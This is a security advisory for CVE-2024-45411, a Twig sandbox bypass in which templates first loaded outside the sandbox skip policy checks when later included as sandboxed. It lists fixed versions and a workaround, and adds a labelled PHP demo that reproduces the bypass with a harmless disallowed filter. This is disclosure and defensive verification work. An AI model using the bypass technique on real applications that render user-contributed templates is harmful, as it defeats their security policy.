PT-2024-31614 · Twig

Vendor: Fabpot · Published: 2024-09-09 · Updated: 2026-05-22 · CVE-2024-45411

CVSS v3.1: 8.6 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Twig versions prior to 1.44.8; Twig versions prior to 2.16.1; Twig versions prior to 3.14.0.
Description: Under some circumstances, the sandbox security checks are not run, which allows user-contributed templates to bypass the sandbox restrictions. The issue occurs when the sandbox is disabled globally and a sandboxed include() function references, by name, a template that has already been loaded in a non-sandbox context. The policy check for tags, filters and functions is performed when the compiled template object is instantiated; if that happened while the sandbox was off, the check was a no-op, and the cached template object is later reused inside the sandboxed include() without ever being checked against the security policy. Only integrity is affected (I:H), but the template engine runs with the privileges of the application, hence the changed scope (S:C).
Recommendations: For versions prior to 1.44.8, update to version 1.44.8 or later. For versions prior to 2.16.1, update to version 2.16.1 or later. For versions prior to 3.14.0, update to version 3.14.0 or later. As a temporary workaround, enable the sandbox globally (the second constructor argument of SandboxExtension) so that the checks run regardless of the order in which templates are loaded. Note that a global sandbox also subjects trusted templates to the security policy, so the policy must allow every tag, filter, function, method and property those templates use.
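The trigger condition and the workaround described above, as an added example in PHP that is not code from the advisory or from the Twig project. The template names, their contents, the deny-all security policy and the Composer autoload path are assumptions made for the demonstration; the Twig classes and the include() function's sandboxed argument are real Twig APIs.

```php
<?php
// Added example, not code from the advisory or the Twig project. It reproduces the
// trigger condition the advisory describes (sandbox off globally, a sandboxed
// include() of a template name that was already loaded outside the sandbox) and
// reports whether the security policy was enforced. Assumptions: Twig is installed
// with Composer (vendor/autoload.php); the template names 'layout.twig' and
// 'user.twig', their contents and the security policy are constructed for this demo.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

/**
 * Environment with a deny-everything policy. With $sandboxedGlobally = false the
 * sandbox is active only inside include(..., sandboxed = true); with true it is
 * always active, so the trusted layout must itself be allowed to call include().
 */
function buildEnvironment(bool $sandboxedGlobally): Environment
{
    $loader = new ArrayLoader([
        // Trusted template: renders the untrusted one with the sandbox switched on.
        'layout.twig' => "{{ include('user.twig', sandboxed = true) }}",
        // Untrusted, user-contributed template: 'upper' is not an allowed filter.
        'user.twig'   => "{{ 'pwned'|upper }}",
    ]);

    $twig = new Environment($loader, ['cache' => false, 'autoescape' => false]);
    $allowedFunctions = $sandboxedGlobally ? ['include'] : [];
    // SecurityPolicy(tags, filters, methods, properties, functions)
    $policy = new SecurityPolicy([], [], [], [], $allowedFunctions);
    $twig->addExtension(new SandboxExtension($policy, $sandboxedGlobally));

    return $twig;
}

/**
 * Renders layout.twig and returns either its output or "blocked: <reason>".
 * When $preloadOutsideSandbox is true, user.twig is first loaded (compiled and
 * instantiated) while no sandbox is active, which is the advisory's trigger.
 */
function renderUserTemplate(Environment $twig, bool $preloadOutsideSandbox): string
{
    try {
        if ($preloadOutsideSandbox) {
            $twig->load('user.twig');
        }

        return $twig->render('layout.twig');
    } catch (SecurityError $e) {
        return 'blocked: ' . $e->getMessage();
    }
}

// 1. Fresh environment: user.twig is first seen inside the sandboxed include,
//    so every version enforces the policy ("blocked: ...").
echo 'fresh load     : ' . renderUserTemplate(buildEnvironment(false), false) . PHP_EOL;

// 2. Same configuration, but user.twig was loaded earlier outside the sandbox.
//    Vulnerable versions print PWNED; 1.44.8 / 2.16.1 / 3.14.0 and later block it.
echo 'pre-loaded     : ' . renderUserTemplate(buildEnvironment(false), true) . PHP_EOL;

// 3. Workaround from the advisory: sandbox enabled globally. The check no longer
//    depends on load order, but the layout is now policy-checked as well.
echo 'global sandbox : ' . renderUserTemplate(buildEnvironment(true), true) . PHP_EOL;
```

Run the script once against a pre-3.14.0 install (`composer require twig/twig:3.13.0`) and once against 3.14.0 or later: only the second line differs. The untrusted template deliberately uses a disallowed filter rather than a method or property access, because the tag, filter and function checks are the ones skipped by the load-order problem. In case 3 the trusted layout would also be rejected if `include` were not allow-listed, which is the cost of the global-sandbox workaround noted above.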

Weakness Enumeration

Protection Mechanism Failure (CWE-693)

Related Identifiers

BDU:2025-06075
CVE-2024-45411
DLA-3888-1
DSA-5771-1
GHSA-6J75-5WFJ-GH66
USN-7456-1
USN-7549-1

Affected Products

Linuxmint
Red Os
Twig
Ubuntu